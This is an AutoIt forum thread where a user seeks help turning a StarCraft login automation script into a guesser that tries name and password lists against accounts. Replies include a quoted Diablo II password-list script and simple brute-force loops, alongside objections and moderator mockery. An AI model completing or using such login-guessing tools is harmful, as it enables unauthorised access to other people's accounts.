Password Guesser

Hey Everyone I was working on a new project today :whistle:

I tried to make a Password Guesser. All it did was Open up a game and then go to the login screen and type a screen name and then go to the password place and type your password in, then press enter to login.

I am trying to make it so this Password Guesser Picks names from a file that i put my names in, 1 by 1 till the end. Same with the passwords. So for example:

The first name in the Name.txt is Eclipse so it types Eclipse on the login screen and then goes to the password place and sleeps for 1 second and then types the first password in the password.txt if password is wrong it Sleeps for 5 seconds and then goes back to Log in name and types the second Password in the Password.txt file and the same name in the Name.txt list untill it gets it. If all the passwords were wrong then it goes to the second name in the Name.txt if the passwords were all wrong for that it goes and picks another name and same passwords till it gets it and so on...till it has finished the name list.. I Hope you guys understand my bad english -.-

this is what i have so far:

#include <C:\Documents and Settings\nezar1\Desktop\autoit-v3.1.1\Include\GUIConstants.au3>

dim $pass, $accountname

RUn("C:\Program Files\Starcraft\Starcraft.exe"); Runs Sc
Winwaitactive("Brood War")
Sleep(3000)
Send("M")
Sleep(1000)
Send("E")
Sleep(2000)
Send("O")
Sleep(4000)
MouseClick("Left",103,223,2)
Global $pass = FileOpen ( "C:\Documents and Settings\nezar1\Desktop\SpamBot.ini", 0 )

If $pass = -1 Then
    MsgBox ( 0, "Error", "Unable to open passfile.txt." )
    Exit
  EndIf

$accountname=InputBox ("Starcraft", "Enter exact game name:")
Run("C:\Program Files\Starcraft\Starcraft.exe")

sleep(300)
send($accountname)
sleep(1000)
send("{tab}")
sleep(1000)

Func readpass()

While 1

$pass = FileReadLine ( $pass )
      If @ERROR = -1 Then ExitLoop

Sleep(1000)
Send ( $password , 0 )
sleep(100)
Send ( '{ENTER}' )
sleep ( 100 )

Wend
EndFunc

All the code above does is start the program and go to the login screen and type the name i type on the inputbox. Then i wanted it to read the passwords off the SpamBot.txt file and type them in the password place. But it hasnt done that -.-

Also i want this program to read names off a line so i dont have to type in a name everytime its wrong.

Can someone help me please.

Thanks in advance

Edited by Orochimaru

Oops:

$pass = FileReadLine ( $pass )
···
Send ( $password , 0 )

<{POST_SNAPBACK}>

What do you mean oopz -.- you mean the

wend

endfunc

at the end? lol just incase i put it in now :whistle: i get no errors while running the script its just it wont type whats in the spambot.ini where all the passwords are located.

Do you understand how long it would take to guess a password? Above 8 characters, and you are getting into thousands of hours to crack. If this is a fun project, then fine. But your chances of success would be very low. Most games use atleast 16+ characters. Some thing to think about.

first off this is NOT my code....

This is for Diablo II but you may be able to use its information to help you....

SplashTextOn ( 'GateCrasher', 'GateCrasher 1.0 by Snarg (Supa.Snarg@gmail.com)', 200, 100,824,0 )
Sleep (3000)
SplashOff ()

Global $PassFile = FileOpen ( "passfile.txt", 0 )

If $PassFile = -1 Then
Exit
EndIf

$GameName = InputBox ( "Game Name", "Input Game Name", "" )

WinActivate ( "Diablo II" )
Sleep ( 500 )
WinMove ( "Diablo II", '', 0, 0 )
Sleep ( 500 )

Global $QuitIt = HotKeySet ( "{END}", "QuitIt" )

;====== Main Body =======================

TryCurrentName ()
ReadPassList ()

;====== Current Name Function =======================

Func TryCurrentName ()

MouseMove ( 715, 475, 1 )
MouseClick( "left", 715, 475 );Click 'Join'

Sleep ( 500 )
Send ( $GameName , 0 )
Send ( '{TAB}' )
Send ( $GameName , 0 )

MouseMove ( 685, 435, 1 )
MouseClick( "left", 685, 435 );Click 'Join'

Return
EndFunc

;====== QuitIt Function =======================

Func QuitIt ()

FileClose ( $PassFile )
Exit

Return
EndFunc

;====== Passlist =======================

Func ReadPassList ()

While 1

$Password = FileReadLine ( $PassFile )
If @ERROR = -1 Then ExitLoop

MouseMove ( 715, 475, 1 )
MouseClick( "left", 715, 475 );Click 'Join'

Sleep ( 600 )
Send ( $GameName , 0 )
Send ( '{TAB}' )
Send ( $Password , 0 )
Send ( '{ENTER}' )
Sleep ( 600 )
Wend

FileClose ( $PassFile )

EndFunc

and like i said it wasnt made by me

im working on a brute forcer. but i cant get it to do :

a

b

c

aa

ab

ac

now it does:

a

aa

ab

ac

b

ba

bb

bc

i also need to work with recursing...

ill post the code a bit later.

Edited by w0uter

My UDF's:;mem stuff_Mem;ftp stuff_FTP ( OLD );inet stuff_INetGetSource ( OLD )_INetGetImage _INetBrowse ( Collection )_EncodeUrl_NetStat_Google;random stuff_iPixelSearch_DiceRoll

This code was based off of someone elses old code...

@w0uter, not sure if this helps:

opt("TrayIconDebug", 1)
$let = "0123456789abcdefghijklmnopqrstuvwxyz"
$file = FileOpen("output.txt", 2)
If $file = -1 Then Exit
For $a = 1 To StringLen($let)
   For $b = 1 To StringLen($let)
      For $c = 1 To StringLen($let)
         $out = StringStripWS(StringMid($let, $a, 1) & StringMid($let, $b, 1) & StringMid($let, $c, 1), 8); & StringMid($let, $d, 1) & StringMid($let, $e, 1) & StringMid($let, $f, 1) & StringMid($let, $g, 1), 8)
         If StringLen($out) > 3 Then Exit
         FileWriteLine($file, $out)
      Next
   Next
Next
Func OnAutoItExit()
   FileClose($file)
EndFunc  ;==>OnAutoItExit

It's very slow... It takes about 5 seconds on my machine... But if you were to write one in C++, which shouldn't be too hard because the code is basically all For...Next then it would be MUCH faster if written correctly... My output file was 228 KB...

Edited by layer
FootbaG

im working on a brute forcer. but i cant get it to do :

a

b

c

aa

ab

ac

now it does:

a

aa

ab

ac

b

ba

bb

bc

i also need to work with recursing...

ill post the code a bit later.

<{POST_SNAPBACK}>

i made some code to unlock spreadsheets a while back, it's in VBA but the concepts are the same as they would be applied in autoit. the way mine worked to unlock spreadsheets is first it ran through a wordlist trying every word, and then once it went through the whole thing if there was still no luck, it would brute force up to 10 chars i think... arg... was going to include the code but couldn't find it... i'll rewrite it in autoit code with example

$ac= "abcdefghijklmnopqrstuvwxyz";list of acceptable characters
$len = Random(3,5,1);auto generated pass length varies 3 - 5 (keeping short for example)
$pass = ""
do;this loop just populates the autopass to the length we want it.
    $pass = $pass & StringMid($ac,random(1,Stringlen($ac),1),1)
Until StringLen($pass) = $len

$counter = 1; it's no fun if you don't know how many times you had to guess
$av = "";the $xv variables declared here are so that when i concatenate values that don't exist yet, i dont' get an error.
$bv = ""
$cv = ""
$dv = ""
$ev = ""
for $a = 1 to stringlen($ac)
for $b = 1 to stringlen($ac)
for $c = 1 to stringlen($ac)
for $d = 1 to stringlen($ac)
for $e = 1 to stringlen($ac)
$testval = $av & $bv & $cv & $dv & StringMid($ac,$e,1)
if $testval = $pass Then
    MsgBox(0,"done","Got the password " & $pass & " after only " & $counter & " tries")
exit
Else
    $counter = $counter + 1
tooltip($counter)
EndIf
Next
$dV = StringMid($ac,$d,1)
Next
$cV = StringMid($ac,$c,1)
Next
$bV = StringMid($ac,$b,1)
Next
$AV = StringMid($ac,$a,1)
Next

***edit*** just noticed how easily this example could be turned into a UDF... should i do that? just as proof of concept i mean... i have better methods to actually unlock things...

***edit again*** forgot to exit upon success, and added tooltip counter so you know it's working.

Edited by cameronsdad

do you guys realize what your writting

PASSWORD FINDER.... to use other peoples passwords..... hello!!!!

CODE BREAKERS!

8)

<{POST_SNAPBACK}>

it's a brute forcer. the slowest and simplest kind of guesser. anybody could make one of these with just a little bit of effort. run my example but change the lenth to just be 5+ and watch how long it takes. this isn't helping anybody other than to show how the loops work, and the help file does that.

it's a brute forcer.  the slowest and simplest kind of guesser.  anybody could make one of these with just a little bit of effort.  run my example but change the lenth to just be 5+ and watch how long it takes.  this isn't helping anybody other than to show how the loops work, and the help file does that.

<{POST_SNAPBACK}>

Hey cameronsdad i looked at yours and i checked it out it works good but i dont even know where to start to put that in my code -.-

This is my Source all this does is start the game and then a inputbox pops up at the login screen and i type the login screen i want in the inputbox. After 1 second it types the first password in the password.ini list in the password place. But can you somehow make this source so that it reads off the password list 1 by 1 till it reaches the end of the password list. Also if its possible i want to have the same thing for Names list. So basically The first name in the names list goes in to the Login name place. Then the password list tries all the passwords in it to guess the right one.. If they are all wrong then the next name in the name list comes up and all those passwords are tried on that name also if wrong then next name. I hope u understand my bad english -.- But can you see what you can do to make this better please.

#include <C:\Documents and Settings\nezar1\Desktop\autoit-v3.1.1\Include\GUIConstants.au3>

dim $pass, $gamename, $password
Hotkeyset("{Esc}", "Quit")
func quit()
exit
endfunc

If $pass = -1 Then
    MsgBox ( 0, "Error", "Unable to open passfile.txt.")
    Exit
  EndIf

RUn("C:\Program Files\Starcraft\Starcraft.exe"); Runs Sc
Winwaitactive("Brood War")
Sleep(3000)
Send("M")
Sleep(1000)
Send("E")
Sleep(2000)
Send("O")
Sleep(3000)
MouseClick("Left",103,223,2)
$pass = FileOpen("C:\Documents and Settings\nezar1\Desktop\Passwords.ini",2)
  If $pass = -1 Then
    Exit
  EndIf

$gamename=InputBox ("Starcraft", "Account you want:")
Run("C:\Program Files\Starcraft\Starcraft.exe")

sleep(300)
send($gamename)
sleep(200)
send("{tab}")
sleep(300)

While 1
    $password = FileReadLine($pass)
    If @error = -1 Then ExitLoop
Sleep(1000)
send($Password,2)
Sleep(1000)
Send("{Enter}")
Wend

FileClose($pass)

Thanks in advance i'll be looking back real quick and a lot to see what you got :whistle:

Me again -.- can someone please show me how to make it so it goes trough all of my passwords from 1 to w/e and if those passwords are not right. Then the next name comes up and all those passwords are tried on that name and so on. Someone please tell me how to do that and im done -.- My Code is up already so if you guys can help please.

• Moderators

Yeh, and while your at it.. Can I have your social security number/ most common user id's / names of your children / spouse / parents / close relatives / close friends / favorite pet / city you were born in / credit card('s) information / zip code of your billing address / and anything else that may come in handy :whistle:

Common sense plays a role in the basics of understanding AutoIt... If you're lacking in that, do us all a favor, and step away from the computer.

Yeh, and while your at it.. Can I have your social security number/ most common user id's / names of your children / spouse / parents / close relatives / close friends / favorite pet / city you were born in / credit card('s) information /  zip code of your billing address / and anything else that may come in handy :whistle:

<{POST_SNAPBACK}>

You forgot shoe size :dance::dance::(

Time you enjoyed wasting is not wasted time ......T.S. Elliot
Suspense is worse than disappointment................Robert Burns
God help the man who won't help himself, because no-one else will...........My Grandmother